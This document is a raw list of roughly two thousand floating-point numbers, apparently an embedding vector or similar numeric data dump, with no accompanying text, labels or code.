0.021886741742491722, -0.004886286798864603, 0.012042487040162086, 0.020102670416235924, -0.02825842797756195, -0.0005784296663478017, -0.018063729628920555, -0.01315753161907196, -0.0066305361688137054, -0.01674160547554493, 0.01024248544126749, -0.006598677486181259, 0.0026780993212014437, 0.0019274350488558412, -0.004364605061709881, -0.009756644256412983, 0.04689561203122139, -0.016008861362934113, 0.0015680321957916021, 0.025789400562644005, -0.019720368087291718, -0.020373467355966568, -0.004603543318808079, 0.004372569732367992, -0.005869915708899498, -0.006550889927893877, 0.003719471860677004, -0.009892042726278305, 0.012496469542384148, -0.024100903421640396, -0.02207789197564125, -0.00007634823123225942, 0.0013768816133961082, 0.009111511521041393, -0.01485399343073368, 0.009629210457205772, -0.00884867925196886, 0.007741598878055811, 0.015889393165707588, 0.017856650054454803, -0.013237178325653076, -0.002166373422369361, -0.017824791371822357, -0.00375730381347239, 0.02072390913963318, 0.0006764938589185476, -0.012982310727238655, -0.005475667770951986, 0.010099122300744057, 0.020771697163581848, 0.03294161707162857, -0.009748679585754871, 0.012807088904082775, -0.03392922878265381, -0.008737174794077873, 0.001284293015487492, -0.018047800287604332, -0.013412399217486382, -0.015777887776494026, 0.020198244601488113, -0.02596462145447731, -0.001572014414705336, 0.014256647787988186, 0.0335787869989872, -0.011827442795038223, -0.0024969044607132673, -0.03322834521532059, 0.007219917140901089, -0.023033645004034042, 0.05998942628502846, 0.00991593673825264, 0.009382307529449463, -0.011819478124380112, 0.014893816784024239, -0.016614172607660294, 0.021042494103312492, 0.00413761381059885, 0.0339929461479187, 0.003319250186905265, 0.004221241921186447, 0.009836290962994099, -0.021791167557239532, 0.006140712648630142, 0.002885179128497839, -0.007207970134913921, 0.019895590841770172, 0.026936303824186325, -0.009557529352605343, 0.02238054759800434, -0.01584956981241703, 0.004288941156119108, 0.024642497301101685, 0.00204889546148479, -0.014208860695362091, 0.019003553315997124, -0.006670359056442976, 0.007705757860094309, -0.023686744272708893, 0.014264612458646297, -0.0007322461460717022, -0.010847795754671097, -0.015467268414795399, -0.00580619927495718, -0.01024248544126749, 0.0007083523087203503, -0.026777010411024094, -0.007490713614970446, 0.008330979384481907, -0.007677881978452206, 0.010369919240474701, 0.008338944055140018, -0.010107086971402168, 0.011261955834925175, -0.00757434219121933, 0.02720710076391697, 0.012719478458166122, 0.009995582513511181, -0.01365133747458458, 0.0017452447209507227, 0.030568163841962814, -0.011054875329136848, -0.009836290962994099, 0.019959306344389915, -0.003838940989226103, 0.000619248254224658, -0.0029230110812932253, -0.036254893988370895, 0.00029867279226891696, 0.02755754254758358, 0.03275046870112419, -0.015634525567293167, -0.016112402081489563, -0.0024152672849595547, 0.028067277744412422, -0.004699118435382843, -0.024132762104272842, -0.0017930322792381048, 0.029978783801198006, -0.0019652668852359056, 0.02586904540657997, 0.009398236870765686, -0.004890269134193659, -0.0070685893297195435, -0.0013689169427379966, 0.01250443421304226, 0.000618750462308526, 0.011787619441747665, 0.007080536335706711, 0.006534960586577654, -0.018175235018134117, 0.0022042051423341036, -0.03287789970636368, 0.019322138279676437, 0.0011250008828938007, 0.013683196157217026, -0.001285288599319756, 0.009852219372987747, 0.015284081920981407, -0.025741612538695335, -0.019991165027022362, -0.013324788771569729, 0.017362844198942184, 0.004707083106040955, -0.012655762024223804, 0.018430102616548538, -0.005702659022063017, -0.0017253331607207656, 0.010600892826914787, -0.003864825936034322, -0.003787171095609665, -0.01238496508449316, -0.0020319705363363028, 0.01898762583732605, 0.0009497794671915472, 0.017155764624476433, 0.001357965636998415, -0.02371860109269619, -0.0006750004831701517, -0.00872124545276165, 0.011779654771089554, 0.006750005297362804, 0.004663277883082628, 0.00787301454693079, -0.009334520436823368, 0.0025586301926523447, 0.007303545251488686, -0.0015461294678971171, 0.012623903341591358, -0.008737174794077873, 0.004416374955326319, 0.002052877563983202, 0.002118585631251335, 0.01688496768474579, 0.0077495635487139225, -0.008928325027227402, -0.0003668697318062186, 0.022810636088252068, 0.00996372476220131, -0.007247793022543192, 0.0002288580290041864, -0.012918593361973763, 0.031460199505090714, 0.0016646030126139522, 0.004480091854929924, 0.004093808587640524, 0.00896814838051796, -0.006132747977972031, -0.020023023709654808, 0.016677888110280037, -0.0021265503019094467, 0.0036856222432106733, -0.0019871697295457125, -0.011676114983856678, -0.005196906626224518, 0.011532751843333244, -0.003504427382722497, -0.004288941156119108, -0.011572575196623802, -0.010409742593765259, 0.0011120584094896913, 0.023001786321401596, 0.0037991178687661886, -0.003793144365772605, -0.031237192451953888, 0.023304441943764687, 0.010003547184169292, 0.011978769674897194, -0.010800007730722427, -0.0034705777652561665, 0.005129207391291857, 0.02432391233742237, -0.008307086303830147, -0.009111511521041393, 0.00662655383348465, -0.017362844198942184, 0.003388940589502454, -0.02596462145447731, 0.005141154397279024, -0.011150450445711613, 0.024881435558199883, 0.012735407799482346, 0.0030783209949731827, -0.017713287845253944, -0.00003574739821488038, 0.017601782456040382, 0.008840714581310749, 0.012910629622638226, -0.013444257900118828, 0.0000354362819052767, 0.021249573677778244, 0.003691595746204257, -0.009525670669972897, 0.01674160547554493, 0.0057106236927211285, -0.010720361955463886, -0.002885179128497839, -0.007665934972465038, 0.014877887442708015, 0.0039444719441235065, 0.007311509922146797, 0.0007705757743678987, 0.008912395685911179, -0.021902671083807945, 0.001858740346506238, -0.00029419269412755966, -0.00030589071684516966, -0.019322138279676437, -0.020007094368338585, 0.01873275823891163, 0.00751460762694478, 0.0019134969916194677, -0.004902216140180826, -0.002283851383253932, 0.023336300626397133, 0.02421240694820881, -0.0022480105981230736, 0.012400894425809383, -0.009000007063150406, 0.0028214622288942337, 0.008689386770129204, -0.012249566614627838, 0.007315492257475853, 0.021297361701726913, -0.0012952443212270737, 0.0032316395081579685, 0.022699132561683655, -0.01739470288157463, -0.01143717672675848, 0.009286732412874699, 0.01156461052596569, -0.027270816266536713, 0.00036537638516165316, 0.00022462682682089508, -0.01968851126730442, 0.02561417780816555, -0.028911525383591652, -0.020405326038599014, -0.010401777923107147, 0.0063915979117155075, 0.011978769674897194, -0.016231870278716087, -0.019943377003073692, 0.007797351107001305, 0.00610487163066864, -0.004838499240577221, -0.0005510512855835259, -0.000668031454551965, -0.006586730480194092, -0.004651330877095461, 0.0061168186366558075, 0.006662394385784864, -0.014121249318122864, -0.002146461745724082, -0.008111952804028988, 0.000275027850875631, 0.008490271866321564, 0.00008288169919978827, 0.00014995863602962345, 0.01788850873708725, -0.004734959453344345, 0.008553988300263882, -0.007148235570639372, 0.006120800971984863, 0.014360187575221062, 0.0012773239286616445, -0.03392922878265381, -0.002399338176473975, 0.009063723497092724, 0.024196477606892586, -0.01435222290456295, 0.012807088904082775, 0.009724786505103111, 0.002214160980656743, -0.03136462718248367, -0.00011698017624439672, 0.0031798696145415306, 0.009645139798521996, -0.01849381998181343, -0.01574602909386158, 0.008713280782103539, 0.005869915708899498, -0.007172129116952419, -0.012982310727238655, 0.008012395352125168, -0.015666384249925613, 0.014240718446671963, -0.012926558032631874, 0.007080536335706711, -0.018223023042082787, 0.014678772538900375, 0.0007188058225437999, 0.004265047609806061, -0.007303545251488686, -0.0033013299107551575, -0.04864782467484474, -0.018366385251283646, 0.02053275890648365, 0.000001738368951009761, -0.0038528789300471544, 0.0018527668435126543, 0.002216152148321271, -0.01250443421304226, 0.00008425061969319358, -0.01575399376451969, -0.005567261017858982, 0.017952226102352142, -0.0021763290278613567, -0.0125840799883008, -0.006734075956046581, -0.004436286631971598, -0.008259298279881477, -0.002164382254704833, -0.011230097152292728, -0.017012402415275574, -0.0183345265686512, 0.010887619107961655, -0.01983187347650528, -0.01683718152344227, 0.017617711797356606, 0.018079658970236778, 0.013961957767605782, -0.018015943467617035, -0.03533099964261055, 0.0008935294463299215, 0.011293813586235046, 0.004531861748546362, -0.0003526827786117792, -0.008426555432379246, 0.032909758388996124, 0.014392046257853508, 0.012297354638576508, 0.01884426176548004, 0.020771697163581848, -0.000022929358237888664, -0.012090274132788181, 0.01271151378750801, -0.03443896397948265, -0.016980543732643127, -0.006200447212904692, 0.01713983528316021, -0.014192931354045868, 0.013340718112885952, 0.014455762691795826, -0.008155758492648602, 0.036000028252601624, -0.00008474840433336794, -0.0039225690998137, 0.014638949185609818, 0.005535402335226536, -0.009764608927071095, 0.002807524288073182, 0.017012402415275574, 0.003719471860677004, -0.00752655416727066, -0.021106211468577385, -0.014129213988780975, -0.004806640557944775, 0.020548688247799873, 0.002596462145447731, 0.02660178951919079, 0.0009497794671915472, -0.01111062802374363, -0.01205841638147831, 0.007423014380037785, 0.005642924457788467, -0.002094691852107644, 0.01882833242416382, 0.0001144290145020932, -0.025598248466849327, -0.034407105296850204, 0.012592044658958912, 0.020500900223851204, 0.01452744472771883, -0.012990275397896767, -0.01723541133105755, -0.006690270733088255, -0.017107976600527763, -0.005694694351404905, -0.0044203572906553745, 0.01485399343073368, -0.0024033202789723873, -0.01593717932701111, 0.011054875329136848, 0.014758418314158916, -0.005495579447597265, -0.011739831417798996, 0.005117260385304689, 0.017155764624476433, -0.013898240402340889, -0.0005057525704614818, -0.002835400402545929, 0.007936731912195683, -0.007610182743519545, -0.0006311951437965035, 0.01395399309694767, -0.010967264883220196, 0.002530754078179598, 0.01630355231463909, -0.0005186951020732522, -0.0018418155377730727, -0.021886741742491722, -0.013643372803926468, -0.024084974080324173, 0.010353989899158478, 0.00616460619494319, -0.003886728547513485, 0.0018228995613753796, -0.005029649939388037, -0.009525670669972897, 0.005176994949579239, 0.02132922038435936, -0.01908320002257824, -0.014264612458646297, 0.00929469708353281, 0.001833850983530283, 0.0091672632843256, 0.005802216939628124, -0.005913721397519112, -0.006925226654857397, 0.013961957767605782, -0.02247612364590168, 0.015403551049530506, 0.005081419833004475, -0.004910180810838938, -0.021153997629880905, -0.004981862381100655, -0.007319474592804909, -0.00720000546425581, -0.001310177962295711, -0.003191816620528698, -0.007088501006364822, -0.0021404882427304983, 0.005861951503902674, 0.02542302757501602, 0.008840714581310749, -0.026777010411024094, -0.01774514652788639, 0.009406201541423798, -0.016614172607660294, -0.02147258259356022, 0.014089391566812992, -0.008291156962513924, 0.0027796481736004353, -0.0203256793320179, -0.012050451710820198, 0.014320365153253078, -0.008737174794077873, -0.0062920399941504, -0.012894700281322002, -0.000952268426772207, -0.0018746695714071393, -0.02093098871409893, -0.007721687201410532, -0.006471243686974049, -0.019911520183086395, 0.006471243686974049, -0.012408859096467495, -0.007753545884042978, 0.01725134067237377, -0.010983194224536419, -0.006240270100533962, 0.0016048684483394027, 0.01263186801224947, -0.005312393419444561, -0.0003693586913868785, -0.0026104000862687826, 0.01502921525388956, -0.015084967017173767, -0.011747796088457108, 0.0021504440810531378, -0.0063039870001375675, 0.021902671083807945, -0.012201779522001743, -0.009461954236030579, 0.011907088570296764, 0.018127446994185448, -0.01024248544126749, -0.00309624127112329, -0.019003553315997124, 0.009884078055620193, -0.0033550909720361233, -0.007857085205614567, -0.008641599677503109, -0.0167893934994936, 0.003986285999417305, 0.00323960417881608, -0.0063238986767828465, 0.027334533631801605, 0.011692044325172901, -0.03303719311952591, 0.022762849926948547, -0.015403551049530506, -0.0007730647339485586, 0.03915401175618172, 0.030520377680659294, 0.009923901408910751, 0.0029528783634305, -0.016128331422805786, 0.017968155443668365, -0.0011299786856397986, -0.011246026493608952, 0.029373472556471825, 0.006435403134673834, 0.007924784906208515, -0.009557529352605343, 0.013125673867762089, 0.016470808535814285, -0.018860191106796265, 0.0018517712596803904, 0.0005749451229348779, -0.003126108553260565, 0.008609740994870663, 0.0035820824559777975, 0.023384088650345802, 0.0022360635921359062, -0.02790798619389534, 0.005654871463775635, -0.012440717779099941, 0.0068495627492666245, -0.0022360635921359062, 0.023957539349794388, 0.024530991911888123, 0.00405995873734355, -0.014184966683387756, -0.008490271866321564, 0.014376116916537285, 0.003056418150663376, -0.021265503019094467, 0.006690270733088255, -0.0036617284640669823, -0.0005142149748280644, 0.0013151558814570308, 0.02750975452363491, -0.01287877094000578, 0.0011717929737642407, 0.00016451893316116184, -0.001310177962295711, -0.00807611271739006, 0.009995582513511181, 0.025231877341866493, -0.0008551997598260641, 0.0019642713014036417, -0.013810629956424236, -0.013938063755631447, -0.015889393165707588, -0.0005112282815389335, 0.009884078055620193, -0.0032236750703305006, -0.010553105734288692, 0.013874346390366554, -0.0013967930572107434, -0.009780538268387318, 0.010130980983376503, 0.0012554213171824813, -0.0029688074719160795, -0.009071688167750835, -0.005973455961793661, 0.007916820235550404, -0.04122481122612953, -0.0026163735892623663, -0.01608850806951523, 0.027669047936797142, 0.012161956168711185, 0.011253991164267063, -0.003285400802269578, -0.00767389964312315, -0.01432832982391119, 0.01106283999979496, -0.01408142689615488, -0.0036537637934088707, -0.013946028426289558, -0.0005425888812169433, -0.017968155443668365, 0.03701949864625931, -0.001714381854981184, -0.016072578728199005, 0.022141609340906143, -0.0022579662036150694, 0.0229699295014143, 0.012480540201067924, -0.012169920839369297, -0.03673277050256729, 0.005069472827017307, -0.012050451710820198, -0.009310626424849033, -0.01056106947362423, -0.014535409398376942, 0.020405326038599014, 0.01218585018068552, -0.007108412217348814, -0.02465842477977276, 0.007980536669492722, 0.0017233419930562377, 0.029739845544099808, 0.01465487852692604, 0.011094698682427406, 0.008307086303830147, -0.0047588529996573925, -0.0022519929334521294, 0.0036059762351214886, -0.014551338739693165, -0.023113291710615158, -0.015355763956904411, 0.004073896910995245, 0.0036159318406134844, -0.0074429260566830635, 0.0339929461479187, 0.004910180810838938, 0.0043884990736842155, -0.0022300900891423225, 0.01061682216823101, -0.007833192124962807, -0.0070486776530742645, 0.024530991911888123, -0.008912395685911179, -0.02287435345351696, 0.019146917387843132, -0.004679207224398851, 0.006200447212904692, -0.020118599757552147, 0.0032794272992759943, 0.015881428495049477, 0.008032307028770447, -0.0033411530312150717, -0.002694028662517667, 0.003295356407761574, 0.010035405866801739, 0.005857969168573618, -0.008131864480674267, 0.0032754449639469385, -0.01749027892947197, -0.0033451353665441275, -0.008187617175281048, -0.014543374069035053, 0.02426019497215748, -0.002172346692532301, -0.0033212413545697927, 0.013762841932475567, 0.01788850873708725, -0.0013619479723274708, -0.006503102369606495, -0.015084967017173767, -0.008458413183689117, -0.0006292040343396366, 0.01858939416706562, -0.016916826367378235, -0.011907088570296764, -0.0014634967083111405, 0.013372576795518398, 0.0026024356484413147, 0.007789386436343193, -0.0008054209756664932, -0.019545147195458412, -0.0037533214781433344, -0.0009950782405212522, -0.010951335541903973, -0.015331869944930077, -0.009573458693921566, -0.006284075323492289, -0.010194698348641396, -0.011994699016213417, 0.003795135533437133, 0.017123905941843987, 0.0067300936207175255, -0.007367262151092291, -0.02426019497215748, 0.023463735356926918, -0.012416823767125607, 0.004563720431178808, 0.018653111532330513, -0.0038011090364307165, -0.013842488639056683, -0.012026557698845863, -0.007064606994390488, 0.022539839148521423, -0.0040639410726726055, -0.01530001126229763, 0.025502674281597137, 0.002542701084166765, -0.003968365956097841, -0.005583189893513918, 0.019497359171509743, -0.021663732826709747, 0.02118585631251335, 0.0036278788466006517, -0.0037971267011016607, -0.00048559217248111963, 0.012942487373948097, 0.012751337140798569, -0.003576108952984214, -0.0007436952437274158, -0.016582313925027847, -0.015674348920583725, -0.013858417980372906, -0.0026860639918595552, 0.024196477606892586, -0.014638949185609818, 0.006686288397759199, 0.008840714581310749, 0.0057783229276537895, 0.00742699671536684, 0.010712397284805775, 0.021854883059859276, 0.009708857163786888, -0.0021544264163821936, -0.000393750291550532, -0.0038807550445199013, -0.0068495627492666245, -0.02706373669207096, -0.0058977920562028885, -0.015929214656352997, 0.0015839614206925035, 0.020644262433052063, 0.0024212407879531384, -0.008008413016796112, 0.00790089089423418, -0.010983194224536419, -0.018175235018134117, 0.014535409398376942, 0.007494695950299501, 0.006781863514333963, -0.014957533217966557, -0.03663719445466995, -0.00016962125664576888, -0.021090282127261162, -0.004067923408001661, 0.0021384970750659704, 0.017920367419719696, -0.01639116369187832, 0.00495796836912632, -0.01713983528316021, -0.004774782340973616, 0.012934522703289986, -0.006845580413937569, -0.016072578728199005, -0.011134522035717964, 0.0008895471110008657, -0.0040818615816533566, 0.019353996962308884, -0.007227881345897913, -0.011827442795038223, -0.005061508156359196, 0.0012205761158838868, 0.014989391900599003, -0.0035422593355178833, 0.013715054839849472, -0.0041336314752697945, -0.0033650468103587627, 0.020692050457000732, -0.008402661420404911, 0.006419473793357611, 0.0008158744894899428, 0.00864956434816122, -0.02596462145447731, -0.022014176473021507, 0.0012026557233184576, -0.011214167810976505, 0.012392929755151272, 0.011875229887664318, 0.0165504552423954, -0.017824791371822357, -0.007331421598792076, -0.026792939752340317, -0.011397353373467922, 0.011261955834925175, 0.003094250103458762, 0.016725676134228706, -0.01514868438243866, -0.00002048708665824961, 0.0033212413545697927, 0.014997356571257114, 0.008490271866321564, 0.019895590841770172, -0.00011474012717371807, 0.00011486457515275106, -0.006260181777179241, -0.01573806442320347, 0.0013977886410430074, -0.018159305676817894, -0.004595578648149967, -0.001026438781991601, 0.0010772132081910968, -0.0019702448043972254, -0.0018935855478048325, 0.0003720965178217739, 0.009000007063150406, -0.021695591509342194, -0.02312922105193138, -0.01718762330710888, -0.019369926303625107, 0.00625221710652113, -0.015714170411229134, 0.0058101811446249485, 0.022603556513786316, -0.002146461745724082, 0.0025765507016330957, -0.0037254453636705875, -0.016661958768963814, 0.003263497957959771, 0.003765268251299858, 0.0001502075174357742, 0.02191860042512417, 0.011707973666489124, -0.0036856222432106733, 0.018653111532330513, 0.008546024560928345, 0.007060624659061432, -0.0008651555399410427, -0.01718762330710888, -0.016255764290690422, 0.010123016312718391, -0.020564617589116096, 0.01819116435945034, 0.007207970134913921, 0.010712397284805775, 0.025805329903960228, -0.006821686401963234, -0.013858417980372906, 0.0005689716781489551, -0.006296022329479456, 0.009732750244438648, -0.003074338659644127, -0.018047800287604332, 0.016207976266741753, 0.008044254034757614, -0.01624779962003231, -0.006662394385784864, 0.020293820649385452, 0.019863732159137726, -0.014989391900599003, 0.0026840728241950274, -0.016112402081489563, 0.004093808587640524, -0.005093366838991642, -0.01397788617759943, -0.012695584446191788, 0.008498236536979675, 0.02233275957405567, 0.004515932407230139, -0.022539839148521423, 0.001356970053166151, -0.005921686068177223, 0.007988501340150833, 0.009159298613667488, -0.0025924798101186752, 0.008784962818026543, -0.003339161863550544, 0.00876903347671032, 0.008984077721834183, -0.01709204912185669, -0.004766817670315504, 0.003548232838511467, -0.035107992589473724, 0.0057106236927211285, 0.02661771886050701, 0.007064606994390488, -0.00802036002278328, -0.014670807868242264, 0.009390272200107574, -0.0057106236927211285, -0.001550111803226173, 0.0008706311928108335, -0.022938070818781853, 0.022364618256688118, -0.023336300626397133, -0.007108412217348814, -0.004141596145927906, 0.01729912869632244, -0.008211510255932808, 0.010584963485598564, 0.006805757526308298, 0.0069531025364995, 0.0022957981564104557, 0.030472589656710625, 0.00672611128538847, 0.013468151912093163, 0.014407975599169731, -0.006387615576386452, 0.007084518671035767, 0.003793144365772605, 0.019561076536774635, -0.010999123565852642, 0.0029389401897788048, 0.009517705999314785, 0.0024212407879531384, 0.025630107149481773, -0.015817711129784584, -0.001431638258509338, 0.021408865228295326, 0.01699647307395935, 0.015403551049530506, 0.0050336322747170925, 0.012193814851343632, 0.009756644256412983, 0.014630984514951706, -0.0009836290264502168, -0.0058977920562028885, -0.004036065191030502, -0.018063729628920555, -0.014384081587195396, -0.02556639164686203, -0.005949561949819326, -0.007829209789633751, 0.010051335208117962, -0.0003880257427226752, -0.0007227881578728557, 0.009366379119455814, -0.012233637273311615, 0.009310626424849033, -0.004953986033797264, -0.0030146040953695774, -0.0035661531146615744, 0.010624786838889122, -0.033515069633722305, -0.015331869944930077, -0.012751337140798569, 0.010951335541903973, 0.014288506470620632, -0.0025148249696940184, 0.009143369272351265, 0.0038170383777469397, 0.02062833495438099, -0.012528328225016594, 0.031173475086688995, 0.026028338819742203, -0.0037115071900188923, 0.0015799790853634477, -0.006650447379797697, 0.03526728227734566, 0.0038469056598842144, -0.0021504440810531378, -0.007000890094786882, 0.014161072671413422, 0.019274350255727768, 0.014551338739693165, 0.015459303744137287, 0.005846022162586451, 0.003990268334746361, -0.010409742593765259, 0.002644249703735113, 0.009438060224056244, 0.0005152105586603284, 0.004547791089862585, -0.019911520183086395, -0.0020907095167785883, 0.010075229220092297, 0.024690283462405205, 0.0031798696145415306, 0.016407091170549393, 0.012974346056580544, -0.009071688167750835, -0.018350455909967422, 0.0058101811446249485, -0.02128143236041069, -0.0014893816551193595, 0.001786063308827579, -0.009477883577346802, -0.0061845178715884686, -0.01959293521940708, -0.007231863681226969, -0.0022360635921359062, -0.000569967261981219, -0.023941611871123314, 0.001167810638435185, -0.001974227139726281, 0.000928374589420855, 0.007462837267667055, 0.032224804162979126, 0.029660198837518692, 0.010027441196143627, -0.009852219372987747, 0.014121249318122864, 0.0033272148575633764, 0.01584160514175892, -0.006208411883562803, 0.0017492269398644567, -0.016518596559762955, 0.01664602942764759, 0.0002038441743934527, 0.0018905987963080406, -0.02301771566271782, -0.007769474759697914, -0.011150450445711613, 0.015196471475064754, 0.010353989899158478, -0.013523903675377369, 0.005451774224638939, 0.019561076536774635, 0.00008244613854913041, 0.020564617589116096, -0.012950452044606209, -0.0005460734246298671, 0.008538059890270233, 0.014933639205992222, -0.013468151912093163, -0.01238496508449316, 0.007307527586817741, 0.017219481989741325, 0.018748687580227852, 0.0071681467816233635, 0.006435403134673834, -0.013961957767605782, 0.018063729628920555, 0.00371349835768342, 0.014065497554838657, -0.007646023295819759, -0.00984425563365221, -0.0057783229276537895, -0.01231328397989273, 0.012026557698845863, 0.006319916341453791, -0.0132531076669693, -0.004117702133953571, 0.003544250503182411, -0.0012713505420833826, 0.006180535536259413, 0.025375239551067352, -0.00834690872579813, -0.021854883059859276, -0.0029648251365870237, -0.02496108040213585, 0.01699647307395935, 0.02332037128508091, 0.00012768262240570039, -0.008466377854347229, -0.008084076456725597, 0.006769916508346796, -0.009900007396936417, 0.008856643922626972, 0.005129207391291857, 0.006654429715126753, 0.01225753128528595, 0.02816285379230976, 0.011182309128344059, 0.0023734532296657562, -0.005009738262742758, 0.01858939416706562, 0.004587613977491856, 0.00929469708353281, -0.005447791889309883, -0.003163940506055951, -0.014161072671413422, 0.0034865071065723896, -0.014710630290210247, -0.005686730146408081, 0.001409735530614853, -0.005029649939388037, -0.015140719711780548, 0.007231863681226969, -0.006594695150852203, 0.0039146048948168755, -0.004161507356911898, -0.0082752276211977, -0.004460180178284645, 0.007383191492408514, 0.0031539846677333117, 0.02645842730998993, 0.003882746212184429, 0.004464162513613701, 0.03373807668685913, 0.003717480693012476, 0.014384081587195396, 0.0192265622317791, 0.0014714612625539303, 0.011899123899638653, -0.02142479456961155, 0.001785067724995315, -0.00729956291615963, -0.0018706872360780835, 0.02835400402545929, 0.0014993373770266771, 0.0016795366536825895, -0.00662655383348465, -0.0059854029677808285, 0.00008126389002427459, -0.0077495635487139225, -0.030615951865911484, 0.008060183376073837, -0.0017233419930562377, -0.017569925636053085, 0.005794252268970013, 0.0010095140896737576, -0.025184089317917824, 0.004065932240337133, -0.012026557698845863, -0.0016974570462480187, -0.011859300546348095, -0.0060172611847519875, 0.013053991831839085, 0.01307788584381342, -0.006276111118495464, -0.01964072324335575, 0.007032748777419329, -0.004249118268489838, 0.006598677486181259, -0.0070168194361031055, 0.002146461745724082, 0.023591168224811554, -0.00166659418027848, 0.019768156111240387, 0.024005327373743057, 0.0070685893297195435, -0.005077437497675419, 0.00043257776997052133, -0.0010642707347869873, -0.004675224889069796, 0.013173460960388184, 0.023001786321401596, -0.004177436698228121, -0.008514165878295898, 0.027828339487314224, -0.008362838067114353, 0.010091157630085945, 0.025741612538695335, 0.01447965670377016, 0.004468144848942757, 0.015929214656352997, 0.005093366838991642, 0.004089826252311468, -0.021488511934876442, 0.01952921785414219, 0.013014169409871101, 0.015674348920583725, -0.014519480057060719, 0.0029727898072451353, -0.010202663019299507, 0.0059654912911355495, 0.0037095160223543644, -0.01099115889519453, -0.00942213088274002, -0.005889827385544777, -0.006232305429875851, -0.0037254453636705875, -0.023798247799277306, 0.004205313045531511, -0.005204871296882629, -0.008227439597249031, 0.017410632222890854, -0.010624786838889122, 0.016024790704250336, 0.00896814838051796, -0.00016588784637860954, -0.013993815518915653, 0.014997356571257114, 0.0038946932181715965, 0.02158408798277378, -0.005846022162586451, 0.001621793257072568, -0.004416374955326319, 0.019258420914411545, -0.0007795359706506133, -0.002449116902425885, 0.00006962809129618108, -0.0054398272186517715, 0.025582320988178253, 0.0091672632843256, 0.010648680850863457, 0.02142479456961155, -0.027796480804681778, -0.01674160547554493, 0.012751337140798569, 0.038803569972515106, -0.013269037008285522, -0.0035123920533806086, 0.021600015461444855, 0.0051531014032661915, -0.0071044303476810455, -0.02038939669728279, 0.009684963151812553, 0.007184076122939587, -0.004368587397038937, 0.007004872430115938, 0.006503102369606495, -0.01295841671526432, -0.022412406280636787, -0.0055911545641720295, -0.010067264549434185, 0.033419493585824966, -0.0012932531535625458, 0.002755754394456744, -0.006435403134673834, 0.006419473793357611, 0.00023420924844685942, -0.006208411883562803, 0.010640716180205345, 0.014798241667449474, -0.011413282714784145, -0.00185674917884171, -0.004261065274477005, 0.0009497794671915472, -0.0015112842665985227, 0.010696467943489552, 0.0022280989214777946, 0.019959306344389915, -0.004464162513613701, 0.021440723910927773, -0.0024929221253842115, 0.007697793189436197, -0.0007247793255373836, 0.004599560983479023, 0.009900007396936417, -0.011930982582271099, -0.006562836933881044, 0.0012096248101443052, -0.030488518998026848, -0.006073013413697481, 0.010776114650070667, 0.039886754006147385, 0.01739470288157463, 0.01917877607047558, 0.00448407419025898, 0.00014659855514764786, -0.001691483543254435, 0.033355776220560074, -0.00002670943649718538, 0.013794700615108013, 0.0068495627492666245, 0.0036856222432106733, 0.009645139798521996, -0.003992259502410889, -0.0061168186366558075, -0.005276552867144346, 0.00685354508459568, -0.00942213088274002, 0.005885845050215721, 0.0014186957851052284, -0.009238945320248604, 0.003962392453104258, 0.01016283966600895, -0.028640730306506157, 0.003126108553260565, 0.00257256836630404, -0.014121249318122864, -0.008553988300263882, -0.004288941156119108, 0.02107435278594494, 0.026569930836558342, 0.002670134650543332, -0.005802216939628124, -0.016661958768963814, 0.020070811733603477, 0.005467703100293875, 0.018366385251283646, -0.0032475688494741917, 0.014869922772049904, -0.007231863681226969, -0.019019482657313347, -0.008681422099471092, -0.0026163735892623663, 0.00998761784285307, -0.02547081559896469, -0.0048584109172225, 0.014320365153253078, -0.000859679828863591, -0.00010397546429885551, -0.00738717382773757, -0.007391156163066626, 0.007004872430115938, 0.0005346242687664926, -0.0025665948633104563, -0.0008397683268412948, -0.005384074989706278, -0.026235418394207954, 0.0026860639918595552, -0.004360622726380825, 0.006590712815523148, 0.00685354508459568, 0.007144253235310316, 0.0131336385384202, 0.005073455162346363, -0.018923908472061157, -0.022205326706171036, -0.011469035409390926, 0.00023284033522941172, 0.008410626091063023, -0.0058977920562028885, -0.03813454136252403, -0.0001492119481554255, -0.006909297313541174, 0.007789386436343193, 0.0023396036121994257, 0.012894700281322002, -0.01036195456981659, 0.0054398272186517715, -0.010051335208117962, -0.013030098751187325, 0.011707973666489124, 0.0012823018478229642, -0.014407975599169731, 0.0033252236898988485, -0.0008133855881169438, 0.0005849009030498564, -0.019561076536774635, 0.0008387727430090308, 0.0069849612191319466, -0.010879654437303543, 0.0026163735892623663, 0.01123806182295084, -0.001021460979245603, -0.013611515052616596, -0.003452657489106059, -0.025677895173430443, 0.01484602876007557, 0.01024248544126749, -0.015889393165707588, 0.017761075869202614, 0.003074338659644127, 0.008984077721834183, -0.006487173028290272, -0.009971688501536846, 0.00432478217408061, -0.0009836290264502168, -0.007677881978452206, 0.01917877607047558, 0.0033491174690425396, 0.024499133229255676, 0.004599560983479023, -0.001260399236343801, 0.018031872808933258, 0.007303545251488686, 0.0043526580557227135, 0.0031619493383914232, -0.021568158641457558, -0.002811506623402238, -0.035107992589473724, 0.0044721271842718124, -0.0020887183491140604, -0.004492038860917091, -0.015411515720188618, 0.0016347357304766774, 0.007896908558905125, 0.016375234350562096, -0.02481771819293499, -0.0038150472100824118, 0.0047469064593315125, -0.02601240947842598, -0.00047787645598873496, 0.006785845849663019, -0.00045920940465293825, -0.011070804670453072, -0.003171904943883419, 0.00514513673260808, 0.0031141615472733974, 0.026378780603408813, 0.01497346255928278, 0.010178769007325172, 0.021966388449072838, -0.0003885235346388072, 0.020261961966753006, 0.01763364113867283, 0.008378767408430576, -0.009151333943009377, -0.007618147414177656, -0.005224782507866621, 0.010704432614147663, -0.0013141602976247668, 0.0035661531146615744, 0.01338054146617651, 0.003054426982998848, -0.007399120833724737, 0.0024909311905503273, -0.010250450111925602, 0.017123905941843987, 0.0018298686482012272, 0.015315940603613853, 0.010178769007325172, -0.02038939669728279, -0.003241595346480608, 0.007331421598792076, -0.0013400452444329858, 0.05849207937717438, -0.009971688501536846, 0.009692927822470665, -0.005722570698708296, -0.01584956981241703, -0.017665499821305275, -0.013316824100911617, -0.0030862854328006506, -0.02034160867333412, -0.02352745085954666, 0.004004206508398056, -0.0003121130575891584, -0.00508540216833353, -0.0013808638323098421, 0.003689604578539729, -0.0019841829780489206, 0.001430642674677074, 0.0007083523087203503, -0.0009632197325117886, -0.02034160867333412, 0.0007222903659567237, 0.023543380200862885, 0.005527437664568424, 0.025279665365815163, -0.0014226781204342842, -0.00439646327868104, -0.008291156962513924, 0.0040639410726726055, 0.0017561960266903043, 0.005400003865361214, 0.03176285699009895, -0.009605317376554012, 0.01275930181145668, 0.016773464158177376, 0.0008323015063069761, 0.01650266721844673, 0.0016765499021857977, 0.008251333609223366, 